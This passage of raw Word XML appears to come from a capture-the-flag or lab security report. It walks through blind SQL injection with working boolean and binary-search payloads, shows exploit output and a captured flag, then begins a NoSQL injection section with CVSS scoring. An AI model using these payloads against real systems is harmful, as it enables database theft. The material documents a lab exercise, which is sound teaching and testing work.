    <w:p w14:paraId="1EA23853" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Binary Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Optimisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5057970D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Instead of guessing each character linearly (up to 95 attempts), the exploit uses binary search on the ASCII ordinal value. This reduces worst-case requests from 95 to 7 per character (log2(95) ≈ 7), making the full 43-character flag extractable in approximately 300 HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4AB1D4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step-by-Step Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B94DF45" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Probe: send a single quote as username. Any response change confirms SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694617F4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm injection works: admin’ OR 1=1 -- - returns Welcome back, confirming the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> oracle is functional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4111ED31" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Measure flag length using binary search: ' OR (SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>LENGTH(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>flag) FROM secrets LIMIT 1) &lt;= 40 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C54CD0" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Extract each character position using binary search on ORD(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>SUBSTR(flag,N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>,1)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1720A381" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Verify each character with a direct equality check before appending to the flag string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2D3A78" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> 43 positions, the complete flag is printed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1428E6B0" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="0026A04B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t>Exploit Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E0131E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>python vuln2/solve/exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034A56BF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="55EE8E04" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t>Expected Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCB04E0" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[+] Confirmed: secrets table exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686D28C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[*] Measuring flag length … 43 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D484883" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[✓] Position   1/ 43 → 'F</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Flag so far: F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4912829C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[✓] Position   2/ 43 → 'L</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Flag so far: FL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66297D47" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B7E821" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG CAPTURED: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>blind_sqli_char_by_char_exfil_success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5123F1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="65DC81E1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.5 Impact Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576F90D2" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Full confidentiality breach — every table in the MySQL database can be exfiltrated without triggering application errors or logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E139A55" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Credential theft — the users table contains plaintext passwords for admin, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>alice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">, bob, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>charlie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0114AB1D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Transaction data exposure — the transactions table exposes financial records of all customers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F5314F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Stealth — blind injection produces no visible database errors and may evade basic intrusion detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297158E7" w14:textId="77777777" w:rsidR="00E13696" w:rsidRPr="00872AAE" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Scalability — the binary search technique is fully automatable and requires no manual interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1B4D0C" w14:textId="22DBEF8A" w:rsidR="00872AAE" w:rsidRDefault="00872AAE" w:rsidP="00872AAE">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A814C95" wp14:editId="25C12540">
            <wp:extent cx="6400800" cy="2770505"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5958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2138" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="2770505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C675FC" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="56A91099" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>FLAG{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>blind_sqli_char_by_char_exfil_success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEEA56F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="144D63BA" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1B3A6B"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>5. Vulnerability 3 — NoSQL Operator Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F78639" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Vulnerability Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE526A0" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">NoSQL Operator Injection — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>CorpPortal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> Document System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B07B3F3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE / CWE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>CWE-943 — Improper Neutralization of Special Elements in Data Query Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418F3370" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Component: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>vuln3-app (Flask) + vuln3-db (MongoDB 6.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB53870" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Exposed Port: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>5003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053C28B6" w14:textId="1FCA1945" w:rsidR="002D3A3C" w:rsidRDefault="002D3A3C">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Database initialization is in App.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C42F7FB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="5030231C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.2 CVSS v3.1 Scoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BFDB96" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector String: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>CVSS:3.1/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>AC:L</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>PR:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>UI:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>S:U</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>/C:H/I:H/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>A:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1857F158" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
        </w:rPr>
        <w:t xml:space="preserve">Base Score: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>9.1 — CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D28D5F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E136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E13696" w14:paraId="6EDDF24F"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886252B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metric</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3D4CAA2E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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1297799" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="773F466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A5B6B6" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack Vector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F4142" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network</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572BFC" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>All three vulnerable endpoints are accessible over HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="6A512BF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17DA24E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
